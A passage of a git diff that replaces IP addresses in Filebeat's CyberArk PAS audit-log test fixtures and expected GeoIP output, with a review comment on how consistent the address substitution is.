@@ -1 +1 @@ -<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"130","Desc":"CPM Disable Password","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Disable Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Disable Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} 
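Review bot: The address substitution in this record is not one-to-one and is not explained anywhere visible: the `File` name keeps a separate address (35.192.121.42 → 67.43.156.12) from the `Address`, `LogonDomain` and `ExtraDetails` fields (34.66.114.180 → 81.2.69.143), and 81.2.69.143 also stands in for 34.71.250.247 in other fixtures in this diff. That makes it hard to verify later that every real address was replaced and that the field relationships within a record were preserved as intended. A short old → new mapping, in the commit message or in the test directory's README if one exists, naming the reserved ranges the replacements come from, would make the substitution auditable. The private `Station` 10.0.1.20 is left untouched, which looks right.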
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log-expected.json index b99a40e81604..7701671a6d2e 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/130_cpm_disable_password.log-expected.json @@ -2,7 +2,7 @@ { "@timestamp": "2021-03-15T12:57:13.000Z", "cyberarkpas.audit.action": "CPM Disable Password", - "cyberarkpas.audit.ca_properties.address": "34.66.114.180", + "cyberarkpas.audit.ca_properties.address": "81.2.69.143", "cyberarkpas.audit.ca_properties.cpm_disabled": "(CPM)MaxRetries", "cyberarkpas.audit.ca_properties.cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "cyberarkpas.audit.ca_properties.cpm_status": "failure", 
@@ -10,21 +10,21 @@ "cyberarkpas.audit.ca_properties.device_type": "Operating System", "cyberarkpas.audit.ca_properties.last_fail_date": "1615813031", "cyberarkpas.audit.ca_properties.last_task": "ReconcileTask", - "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180", + "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143", "cyberarkpas.audit.ca_properties.policy_id": "WinDomain", "cyberarkpas.audit.ca_properties.reset_immediately": "ReconcileTask", "cyberarkpas.audit.ca_properties.retries_count": "5", "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart", "cyberarkpas.audit.desc": "CPM Disable Password", - "cyberarkpas.audit.extra_details.other.address": "34.66.114.180", + "cyberarkpas.audit.extra_details.other.address": "81.2.69.143", "cyberarkpas.audit.extra_details.other.retriescount": "5", "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart", - "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "cyberarkpas.audit.iso_timestamp": "2021-03-15T12:57:13Z", "cyberarkpas.audit.issuer": "PasswordManager", "cyberarkpas.audit.message": "CPM Disable Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", - "cyberarkpas.audit.reason": "MaxRetries. 
Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 130\n CPM Disable Password\n Error\n PasswordManager\n CPM Disable Password\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=81.2.69.143;retriescount=5;username=ELASTIC\\bart;\n CPM Disable Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.reason": "MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Error", @@ -46,7 +46,7 @@ "change", "user" ], - "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart", "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log b/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log index 78ec9f57fe68..2f9c4e58db73 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log 
@@ -1,12 +1,12 @@ -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T17:59:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add 
User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 81.32.170.205\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n 
Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} -<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 34.71.250.247\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add 
User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T17:59:19Z 
VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:19","IsoTimestamp":"2021-03-10T17:59:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T17:59:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:27","IsoTimestamp":"2021-03-10T17:59:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T22:19:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:06","IsoTimestamp":"2021-03-10T22:19:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMApp_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-10T22:19:15Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:15","IsoTimestamp":"2021-03-10T22:19:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add 
User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMGw_ASR-WIN","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_VAGRANT\n \n \n \n 67.43.156.14\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-11T16:59:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:36\n 2021-03-11T16:59:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_VAGRANT\n \n \n \n 67.43.156.14\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:36","IsoTimestamp":"2021-03-11T16:59:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n 
VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPGW_SSH\n \n \n \n 81.2.69.143\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMPApp_SSH\n \n \n \n 81.2.69.143\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMPApp_SSH","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} +<5>1 2021-03-14T12:57:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 180\n Add User\n Info\n Administrator\n Add User\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n \n 81.2.69.143\n \n \n \n \n \n Add User\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:21","IsoTimestamp":"2021-03-14T12:57:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"180","Desc":"Add 
User","Severity":"Info","Issuer":"Administrator","Action":"Add User","SourceUser":"PSMP_ADB_asr-cyberark-psm-ssh","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add User","GatewayStation":""}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log-expected.json index 9262f4a6fdb6..886fa9558656 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/180_add_user.log-expected.json @@ -9,7 +9,7 @@ "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", "cyberarkpas.audit.source_user": "PSMPApp_localhost.localdomain", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 01:11:20", "event.action": "add user", "event.category": [ @@ -36,22 +36,19 @@ "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "PSMPApp_localhost.localdomain" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" 
@@ -68,7 +65,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMPGW_localhost.localdomain",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:20",
 "event.action": "add user",
 "event.category": [
@@ -88,29 +85,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 581,
+ "log.offset": 580,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
